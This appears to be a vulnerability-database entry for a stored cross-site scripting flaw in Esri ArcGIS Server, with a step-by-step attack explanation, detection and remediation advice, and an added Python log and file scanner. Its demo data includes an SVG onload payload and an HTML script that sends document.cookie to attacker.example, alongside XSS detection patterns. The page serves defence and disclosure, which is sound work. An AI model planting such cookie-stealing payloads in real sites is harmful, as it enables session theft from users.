CVE-2025-67710

Source: psirt@esri.com

MEDIUM
6.1
Published: December 31, 2025 at 11:15 PM
Modified: January 6, 2026 at 07:04 PM

Vulnerability Description

There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.

CVSS Metrics

Base Score
6.1
Severity
MEDIUM
Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Weaknesses (CWE)

Source: psirt@esri.com

AI Security Analysis

01 // Technical Summary

Esri ArcGIS Server 11.4 and earlier, on Windows and Linux, carries a stored cross-site scripting (XSS) flaw: in some configurations a remote, unauthenticated attacker can store files on the server whose contents a victim's browser later renders as active content, so attacker-controlled JavaScript runs in the victim's session with the ArcGIS Server site. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) bounds the impact: low confidentiality and integrity impact, no availability impact, and the victim has to load the stored content (UI:R). Realistic outcomes are theft of session material and actions carried out through the victim's browser against the GIS site; nothing on this page supports direct server compromise or denial of service.

02 // Vulnerability Mechanism

Step 1: Payload Creation: The attacker prepares a file whose bytes are active web content, typically HTML or SVG carrying a script element, an event-handler attribute, or a javascript: URL. The script is written to run in the ArcGIS Server origin: read what the page can read, send requests that carry the victim's browser-held credentials, or redirect the victim to a phishing page.

Step 2: Payload Delivery: The attacker submits the file to the ArcGIS Server through a storage path that, in the affected configurations, accepts it without authentication and without checking that its contents are inert. The advisory does not name the endpoint or the file type; the essential property is that the stored bytes are attacker-controlled. Disguising the file with an image extension is a common tactic because many handlers trust the extension rather than the content.

Step 3: Payload Storage: The server keeps the file as submitted. Nothing rewrites, re-encodes or neutralises its contents before it is later served back.

Step 4: Victim Interaction: A user with a session on the server loads the stored file from the ArcGIS Server origin, by following a link, by viewing a map or web application that references it, or by opening it from a listing. This is the UI:R half of the vector. The attack works when the response is served inline from the site origin with a type the browser renders as a document (for example text/html or image/svg+xml) rather than as a download.

Step 5: Payload Execution: Rendered as a document in the server's origin, the stored file's script runs with the victim's session. S:C in the vector reflects that the vulnerable component (the server's file storage) is distinct from the impacted one (the victim's browser and, through it, the victim's account on the site).

03 // Deep Technical Analysis

The vulnerability stems from storing attacker-supplied file contents and later serving them from the application origin without neutralising them. For file-backed stored XSS, the usual root causes are two independent omissions: the storage path does not reject files whose bytes are active web content (it validates extension or declared MIME type, if anything, rather than the actual bytes), and the serving path does not prevent rendering (no Content-Disposition: attachment, no X-Content-Type-Options: nosniff, no sandboxing CSP, and the same origin as the rest of the site). Output encoding, the usual fix for template-based XSS, does not apply here: the file is the whole document, so there is nothing to escape it into; the controls are content validation on the way in and safe serving on the way out. The advisory's phrase "in some configurations" indicates that whether the unauthenticated storage path is reachable depends on deployment settings. This page does not identify the specific ArcGIS Server component or endpoint involved.

04 // Exploitation Status

No public proof of concept is referenced on this page. Stored XSS through file storage is normally simple to reproduce once the accepting endpoint and the affected configuration are known, so treat exploitation as low-effort for anyone who can reach the server; the absence of a referenced PoC does not make the issue theoretical.

05 // Threat Intelligence

Nothing on this page attributes this vulnerability to a specific threat actor or campaign. CISA KEV status: not listed as of the modification date above; re-check, since an unauthenticated entry point on a server whose users hold GIS administrator and analyst sessions is attractive to any actor type, from opportunistic credential thieves to targeted intrusions.

06 // Detection & Hunting

  • Network traffic analysis: Inspect POST and PUT requests to the ArcGIS Server whose multipart or raw bodies are HTML, SVG or XHTML, or contain <script, event-handler attributes (onload=, onerror=) or javascript: URLs, especially where the request carries no session or token. Judge by the bytes, not the file extension; an image extension on markup is the tell.

  • Web server logs: In the web-tier logs (IIS, Apache, or the ArcGIS Web Adaptor) and ArcGIS Server's own logs, look for successful write requests from unauthenticated clients to upload or storage resources, bursts of uploads from one source, and later GETs of the same stored item from other users' addresses, which is the victim-interaction half of the attack.

  • File integrity monitoring: Watch the directories where ArcGIS Server keeps uploaded and published content for new files whose content is web markup regardless of extension, and alert on new .html, .htm, .svg and .xhtml files in those locations.

  • Security Information and Event Management (SIEM): Correlate an upload from an external address, a subsequent retrieval of that resource by an internal user, and an outbound request from that user's browser to an unfamiliar domain; the three together are the full attack chain, and the first alone is the earliest signal.

  • Client-side telemetry: A Content-Security-Policy with report-uri or report-to on the ArcGIS site surfaces inline-script executions as violation reports. Do not rely on browser XSS filters; the major browsers removed them.
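The following Python script is an added example, not Esri code and not something the page's source provides, that turns the first three bullets into something runnable: it parses web-tier access-log lines in Combined Log Format for successful unauthenticated write requests to upload-like paths, and scans a directory of stored uploads for active web content regardless of extension. The log lines, file names and request paths are constructed for the demonstration and are not a claim about which ArcGIS Server endpoint the advisory concerns; the functions suspicious_upload_requests, scan_upload_dir and build_demo_dir are this example's own names.

```python
"""Hunting for stored-XSS upload attempts against an ArcGIS Server host.

Added example; not Esri code. Two checks: access-log triage for unauthenticated
successful uploads, and a content scan of stored files for active web content.
"""
import re
import tempfile
from pathlib import Path

# Constructed log lines (Combined Log Format). Hosts and paths are sample data.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jan/2026:10:14:01 +0000] "POST /arcgis/admin/uploads/upload HTTP/1.1" 200 512 "-" "python-requests/2.32"
198.51.100.4 - admin [02/Jan/2026:10:15:22 +0000] "POST /arcgis/admin/uploads/upload HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Jan/2026:10:16:40 +0000] "GET /arcgis/rest/services HTTP/1.1" 200 2048 "-" "curl/8.4"
203.0.113.9 - - [02/Jan/2026:10:17:05 +0000] "POST /arcgis/admin/uploads/upload HTTP/1.1" 403 0 "-" "curl/8.4"
"""

CLF = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse_clf(log_text: str):
    for line in log_text.splitlines():
        m = CLF.match(line)
        if m:
            yield m.groupdict()

def suspicious_upload_requests(log_text: str) -> list:
    """Successful write requests to an upload-like path with no web-tier user.

    Caveat: with ArcGIS token authentication the web-tier user field is '-' for
    everyone; then key on the absence of a token parameter/header instead.
    """
    hits = []
    for rec in parse_clf(log_text):
        if rec["method"] not in ("POST", "PUT"):
            continue
        if not rec["status"].startswith("2"):
            continue
        if "upload" not in rec["path"].lower():   # tune to the deployment's resources
            continue
        if rec["user"] != "-":
            continue
        hits.append(rec)
    return hits

# Byte patterns that mark a stored file as active web content.
ACTIVE_CONTENT = [
    (re.compile(rb"<script\b", re.I), "script tag"),
    (re.compile(rb"<svg\b", re.I), "inline SVG (can carry script/onload)"),
    (re.compile(rb"\bon[a-z]+\s*=", re.I), "event handler attribute"),
    (re.compile(rb"javascript:", re.I), "javascript: URL"),
    (re.compile(rb"<iframe\b|<object\b|<embed\b", re.I), "embedding element"),
]

# Magic bytes expected for common image extensions; mismatch means disguise.
IMAGE_MAGIC = {".png": b"\x89PNG", ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}

def scan_bytes(name: str, data: bytes) -> list:
    findings = [label for pat, label in ACTIVE_CONTENT if pat.search(data)]
    magic = IMAGE_MAGIC.get(Path(name).suffix.lower())
    if magic and not data.startswith(magic):
        findings.append("extension/magic mismatch")
    return findings

def scan_upload_dir(root: Path, head_bytes: int = 65536) -> dict:
    """Map file name -> findings for every stored file that looks active."""
    results = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            findings = scan_bytes(p.name, p.read_bytes()[:head_bytes])
            if findings:
                results[p.name] = findings
    return results

def build_demo_dir() -> Path:
    """Constructed upload directory: one real PNG, one SVG disguised as PNG, one HTML."""
    root = Path(tempfile.mkdtemp(prefix="arcgis-uploads-demo-"))
    (root / "legit.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    (root / "photo.png").write_bytes(
        b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>')
    (root / "report.html").write_bytes(
        b"<html><script>fetch('https://attacker.example/?c='+document.cookie)</script></html>")
    return root

if __name__ == "__main__":
    for rec in suspicious_upload_requests(SAMPLE_LOG):
        print("unauthenticated upload:", rec["ip"], rec["method"], rec["path"], rec["ts"])
    for name, findings in scan_upload_dir(build_demo_dir()).items():
        print("active content in stored file:", name, "->", ", ".join(findings))
```

Point scan_upload_dir at the real directories ArcGIS Server writes uploaded content to, and feed suspicious_upload_requests the web-tier logs; the two outputs join on time and path to confirm that an unauthenticated upload actually landed as active content.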

07 // Remediation & Hardening

  • Upgrade to Esri ArcGIS Server 11.5 or later, which this page lists as the first unaffected version. If Esri has published a security patch for the release line you run, apply it as the interim fix; otherwise plan the upgrade. This is the primary remediation.

  • Review the configuration: The advisory applies only in some configurations. Identify which settings allow unauthenticated clients to store files on the server and disable them where they are not needed; require authentication on any upload or storage path you keep. Administrators cannot add input validation to the server's code, so configuration is the controllable counterpart.

  • Web Application Firewall (WAF): Inspect multipart and raw request bodies on the upload paths for HTML, SVG and script content. Treat this as a secondary control: it sees the attacker's upload but not the response that later reaches the victim, and content checks by extension or declared MIME type are trivially bypassed.

  • Regular security audits and penetration testing: Include the ArcGIS Server upload and storage resources in scope, and test them unauthenticated as well as authenticated.

  • Restrict file upload functionality: Validate stored files by magic bytes rather than extension, reject HTML, SVG and XHTML unless a workflow genuinely requires them, cap upload size, and disable upload paths that are not essential.

  • Serve stored content safely: At the web tier that fronts ArcGIS Server, return user-stored files with Content-Disposition: attachment, X-Content-Type-Options: nosniff and a Content-Security-Policy that sandboxes the document; serving such content from a separate origin is the stronger fix, because an inline-rendered file then cannot reach the GIS site's cookies or tokens. A site-wide CSP that restricts script-src limits the impact of any stored script that does render.

  • Keep server software up to date: Regularly apply security patches and updates to the operating system, the web tier and all installed software components.

08 // Affected Products

Esri ArcGIS Server 11.4
Esri ArcGIS Server 11.3
Esri ArcGIS Server 11.2
Esri ArcGIS Server 11.1
Esri ArcGIS Server 11.0
Esri ArcGIS Server (all versions prior to 11.5) on Windows and Linux